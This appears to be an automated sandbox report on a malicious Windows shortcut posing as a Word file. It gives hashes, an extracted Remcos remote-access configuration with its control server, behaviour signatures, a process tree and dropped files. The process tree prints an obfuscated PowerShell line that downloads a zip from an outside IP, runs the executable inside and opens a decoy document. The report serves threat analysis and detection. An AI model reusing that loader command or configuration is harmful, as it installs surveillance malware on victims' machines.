Analysis
-
max time kernel
147s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
-
submitted
27-07-2024 02:06
General
-
Target
oshad_88.docx.lnk
-
Size
15KB
-
MD5
fb1d6a5925aa809496f8d664fb91146d
-
SHA1
4347f9cb130b55cdf4460ce44b69074ead405f44
-
SHA256
a115bd24258d2fa68c60a051026c9736e99d6bca72ca33c74b92e2965efbb71a
-
SHA512
47812284789b246182ff7f7f96715f8c11c1a91d3bfbc8827d6047dced86017a162fbcb2e427cba44a70b71a68c24801da62d590f42601c5339f7b09b3003a1a
-
SSDEEP
48:81O8xwO/fbjapvpVxCcTjRSbGdCZZGXu/dZZZg:81O8KaapvpVxCYnur
Malware Config
Extracted
remcos
huma
81.19.139.74:4343
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-OMQQOG
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Blocklisted process makes network request 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 14 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 9 IoCs
-
Suspicious use of WriteProcessMemory 19 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\oshad_88.docx.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo khCwCEDIKlKjzgPuqjEzFKgshYvDYgQwVYamePpFKvcStoqfHEQQywGogK; echo ssVXVsXrMDBsSKAxrwJQXAtV; echo QvLyDcwTwtLsQVOTFtbdIgwUnUPbXJLFTiRpgv; if (-not(Test-Path 'pgg.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''8''1.''19''.13''9.7''4/fhtp934657hgjdkldjnblcvpgg.zip -OutFile pgg.zip}; echo dxhXyTUtwdVvacciSBmwIScyKXtlJNXAgzRIvyCyPieWU; Expand-Archive -Path pgg.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/ScreenShot.exe; echo FeFuhdkVqwtovfYWaSNzVwpzATjjDvSiOXskaCVkCojJFaDwgLpWZBEJF; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''8''1.''19''.13''9.7''4/fhtp934657hgjdkldjnblcvracs/oshad_88.docx -OutFile oshad_88.docx; echo HfGmqstScgHpHUmLivaqWlGIpKAtxTbuGTcfklyA; s''t''a''rt oshad_88.docx2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\SecurityCheck\ScreenShot.exe"C:\Users\Admin\AppData\Roaming\SecurityCheck\ScreenShot.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\bj_service_testv4\ScreenShot.exeC:\Users\Admin\AppData\Roaming\bj_service_testv4\ScreenShot.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- System Location Discovery: System Language Discovery
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\oshad_88.docx" /o ""3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\753b75e3Filesize
1.2MB
MD5a4711e8950e249d8b510cb6abbf6f1b2
SHA15e607a496b190b36d9d283eb0355cb920cb25794
SHA256a9eaa3df73d9666be14d5cdd5ec31550c0fd066466960c2c15a2d96e91c87845
SHA5124a89000f8c973995ae9a8ef521fe444028984ae53c2aeebaa9949764204f9a82d4c0621358eba8c9d2d734d1bf8f4068e4cab27b96ad5b09e0f1a60cfba59aba
-
C:\Users\Admin\AppData\Local\Temp\TCD59B7.tmp\gb.xslFilesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kinypm54.1md.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.datFilesize
350B
MD568801276f2f082cafecafe1e3bdfa18f
SHA1995ba70e21c47c482261189d0db168085ba0756f
SHA256c662becc6957fee8448582214c8b4fd309a491ffcb0002a481832f875a159e48
SHA512b9a434c4d49af313a7aaadf304c24ef8769157a630db73f2408958bfe8e15044e4ae714d03dc969aaa00debd634b820ada515c76b3c30cba6316a0d8025639e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-msFilesize
1KB
MD567bbe6231dc73cd4f9a3c670716f60cc
SHA13cb1b02162e2a9459012e8859854cd1d6f23e53d
SHA256f74f146ff294208fb903dd21737f253f62cb2c11d70f13396c722c2928162b7c
SHA5129ff1f5860c8167ee9d1786257c4cd79957e443d3e5e6e6cec59ae5002e617ea0bc0466d583cb92c745b6a2e5119570ad375fd4313cf99ba9f5b20213a78a5535
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-msFilesize
2KB
MD5e58a5f9a776ed7027d621b638757d2c0
SHA148bc556bee447f4b2f8af6eeee4b0d8c9d9d39fd
SHA256213271fb9b3734385699f4c854e8af2fb2fe3c748e5ce89df6479d38e7c1f1b3
SHA51267529dbccea227e81f0f5b79624836d1c650504253b135cf7188faa80a8dadde1e0a9d2e57c476d07113f54bcf1b11220b3f75fc9832320f4213980189893920
-
C:\Users\Admin\AppData\Roaming\SecurityCheck\ScreenShot.exeFilesize
1.3MB
MD56a2cdd8709524999190f4b43a83108c9
SHA147b472ca518760552d1e0fa2d2321339dd596471
SHA256bd0f954149173d3f5766eee5bd78d5f27ea1ea69667da7b3970b0e6154afc85f
SHA5123b9a50892b7b18480380f69f0eb185b663e82da16064b60a262e9f3181f23ee8510b338eb28af7b961ab555082ffc494cc4fa950610d1991e6d1fa12ba497299
-
C:\Users\Admin\AppData\Roaming\SecurityCheck\altorilievo.pptFilesize
942KB
MD5e540c4fcecd77b819094eee15ced316a
SHA1d45eb272fdf83641c942c0b7c66aa1ae313738a0
SHA256577ddb0c94d3814a044af5a4ff2591f1e59d227ae00b37358427e2de2d80ff3d
SHA51201ae43e96ae17b121f2c44b2c67f8ef66e7e278331d4c27d98206304b3a25d3dc211c3a1e2e2c6de6c342007cb67dcfbd7b6af7eeec5c5af5ad8421472d09c8e
-
C:\Users\Admin\AppData\Roaming\SecurityCheck\centenary.appFilesize
29KB
MD5ed5672e9357974fe27faa05c97b9c6ce
SHA1f866486cd73b42d4aedddba71f16cad9d4554fcb
SHA256530f8dbee1036b66a3c77512e216ab0f67779a3640daf2864d1fd8bd7e539c30
SHA512246b0e833f6b081d9a839537039c1b3432501c2d42491cd5feb45e1a82c71e55370532d8854700eea3a335728cb5c4a7a396e6896ff896427a8f95befdf68252
-
C:\Users\Admin\AppData\Roaming\SecurityCheck\madbasic_.bplFilesize
212KB
MD5a734f2428443030c46db9ce3ab2e68a6
SHA11bf4d3e9b4bf1d801a348f2e46cc9887bae12998
SHA256038511fc64801be03d8472a2f7a6ba8a27e0398cf876be1427c1463cf9190c80
SHA512d829ea13a0d736bee3a788822f5c04e58deff6175da735c25b8031d19e9c3c6bfa40af6882b6e842ba466ba0a5d51c766310491d73261a842334215edf09b699
-
C:\Users\Admin\AppData\Roaming\SecurityCheck\maddisAsm_.bplFilesize
64KB
MD511efab4068cb4058207959e2638c2c1a
SHA1b1eac0879dcda14bdc0c2efd7f261d7c175208c3
SHA25611e3568f497c40331ee4a9e9973967e61b224e19204e09ed7451da3b74bd2ff5
SHA512ced6167612674232429c25e52ba051994b09fdaeaf3316505904456ef8d7063f2eb03b5a158f0a424f0ecb49673e6a3d6b57d61183c5f8402da3fe53af0bd185
-
C:\Users\Admin\AppData\Roaming\SecurityCheck\madexcept_.bplFilesize
438KB
MD5562ec96d0f65b0309ad7508d0e0ced11
SHA10fe9dda664f4f8d9ae18603c5a25756710032a6f
SHA256fb64a5954b726d2d0f0bc26113a36dc8a86c469af994ceeaf2e2609743a0a557
SHA512876b82534764b2d156ce64d52771d38f245d330957287773f6b2360f48564b8d4a304449fa6f6400052165aaf433a191af2d3b38b194a9b1e892552dc0805fba
-
C:\Users\Admin\AppData\Roaming\SecurityCheck\rtl120.bplFilesize
1.1MB
MD5e71e48e31ac728a6de7c020645f0c32f
SHA17f86eadd1b7a0ab87b7ce7c2029bdef3d6fe1d8d
SHA25640a1d1a2f276738f568700ddccac99cdcd35b973fc8be86ab826c0d1abc9d6ff
SHA5125e41dbe7efac8a042a14c2f976d1afcd45e3f7531fb60daab61ac17ffd339d34e1c6746fce9e4b591b026598a89e38f36c6d24e33e2de0b39d81806259f9be2a
-
C:\Users\Admin\AppData\Roaming\SecurityCheck\vcl120.bplFilesize
1.9MB
MD5c8cff500ac30e5ef120ecb00bcdc0ebb
SHA16dc63844fbc7e9678d8653d715d1f65c8c9f834b
SHA2567867aa9cb994e770c40e5b827d4f689bdc913b3466965b77a2b322d6c526045b
SHA512de393681162c50507f3a54b957c264a25993e28b38ac7f21df9b2ce2eab9177a46e1336a88a5045c75aa66f5e9cf2b5edeef5516225bdd80ed0c01506489e8b0
-
C:\Users\Admin\AppData\Roaming\SecurityCheck\vclx120.bplFilesize
223KB
MD58aaa3926885b3fa7ae0448f5e700cb79
SHA147bd7d281ddde5ebef8599482212743bf2f7e67b
SHA25647396c301fbe78bfaf9e344936a0f7a4e6d174c096f847e160d822e48012162d
SHA51286d395ca89ec2a988f035ecb32640ddac99247e2568673246388fe310e8c3a44807049e8f3482fae86c453d5e3529a8f2daf8614a1086b6d979e64fd917bbe3a
-
C:\Users\Admin\AppData\Roaming\oshad_88.docxFilesize
15KB
MD535a1aa0fc4972286c1db07e513c3abbc
SHA189f5e48e02a03978cd7931651518472c38a7b272
SHA256be338409f57304177e56712593a9345b54d8361ef1fdc767a2fc683a6508cb4e
SHA512f111c86ea937763d091ed195507ee9b3bc95854e22bf31142a9e96bdeb5c273f91f803ea463f8296d5ce611de3a9d959e993fbc03261022a074a203d14ad29c4
-
memory/1648-144-0x0000000050120000-0x000000005030D000-memory.dmpFilesize
1.9MB
-
memory/1648-137-0x0000000074C40000-0x0000000074DBB000-memory.dmpFilesize
1.5MB
-
memory/1648-112-0x00007FFF9EE10000-0x00007FFF9F005000-memory.dmpFilesize
2.0MB
-
memory/1648-140-0x0000000050000000-0x0000000050116000-memory.dmpFilesize
1.1MB
-
memory/1648-111-0x0000000074C40000-0x0000000074DBB000-memory.dmpFilesize
1.5MB
-
memory/1680-147-0x00007FFF9EE10000-0x00007FFF9F005000-memory.dmpFilesize
2.0MB
-
memory/1680-164-0x0000000074C40000-0x0000000074DBB000-memory.dmpFilesize
1.5MB
-
memory/2020-574-0x00007FFF5EE90000-0x00007FFF5EEA0000-memory.dmpFilesize
64KB
-
memory/2020-113-0x00007FFF5CB40000-0x00007FFF5CB50000-memory.dmpFilesize
64KB
-
memory/2020-94-0x00007FFF5EE90000-0x00007FFF5EEA0000-memory.dmpFilesize
64KB
-
memory/2020-575-0x00007FFF5EE90000-0x00007FFF5EEA0000-memory.dmpFilesize
64KB
-
memory/2020-83-0x00007FFF5EE90000-0x00007FFF5EEA0000-memory.dmpFilesize
64KB
-
memory/2020-95-0x00007FFF5EE90000-0x00007FFF5EEA0000-memory.dmpFilesize
64KB
-
memory/2020-114-0x00007FFF5CB40000-0x00007FFF5CB50000-memory.dmpFilesize
64KB
-
memory/2020-103-0x00007FFF5EE90000-0x00007FFF5EEA0000-memory.dmpFilesize
64KB
-
memory/2020-110-0x00007FFF5EE90000-0x00007FFF5EEA0000-memory.dmpFilesize
64KB
-
memory/2020-573-0x00007FFF5EE90000-0x00007FFF5EEA0000-memory.dmpFilesize
64KB
-
memory/2020-576-0x00007FFF5EE90000-0x00007FFF5EEA0000-memory.dmpFilesize
64KB
-
memory/2032-13-0x00007FFF80760000-0x00007FFF81221000-memory.dmpFilesize
10.8MB
-
memory/2032-14-0x00007FFF80760000-0x00007FFF81221000-memory.dmpFilesize
10.8MB
-
memory/2032-80-0x00007FFF80760000-0x00007FFF81221000-memory.dmpFilesize
10.8MB
-
memory/2032-17-0x000002AB559A0000-0x000002AB559B2000-memory.dmpFilesize
72KB
-
memory/2032-8-0x000002AB554D0000-0x000002AB554F2000-memory.dmpFilesize
136KB
-
memory/2032-18-0x000002AB55990000-0x000002AB5599A000-memory.dmpFilesize
40KB
-
memory/2032-2-0x00007FFF80763000-0x00007FFF80765000-memory.dmpFilesize
8KB
-
memory/2032-16-0x00007FFF80760000-0x00007FFF81221000-memory.dmpFilesize
10.8MB
-
memory/3380-88-0x0000000050120000-0x000000005030D000-memory.dmpFilesize
1.9MB
-
memory/3380-86-0x0000000050000000-0x0000000050116000-memory.dmpFilesize
1.1MB
-
memory/3380-87-0x0000000057000000-0x000000005703F000-memory.dmpFilesize
252KB
-
memory/3380-89-0x0000000059800000-0x000000005986E000-memory.dmpFilesize
440KB
-
memory/3380-91-0x0000000057800000-0x0000000057812000-memory.dmpFilesize
72KB
-
memory/3380-85-0x0000000000400000-0x000000000058B000-memory.dmpFilesize
1.5MB
-
memory/3380-63-0x0000000074C40000-0x0000000074DBB000-memory.dmpFilesize
1.5MB
-
memory/3380-70-0x00007FFF9EE10000-0x00007FFF9F005000-memory.dmpFilesize
2.0MB
-
memory/3380-92-0x0000000050310000-0x0000000050349000-memory.dmpFilesize
228KB
-
memory/4548-517-0x00007FFF9EE10000-0x00007FFF9F005000-memory.dmpFilesize
2.0MB
-
memory/4548-554-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/4548-555-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/4548-553-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/4548-548-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/4548-547-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/4548-545-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/4548-577-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/4548-578-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/4548-579-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/4548-580-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB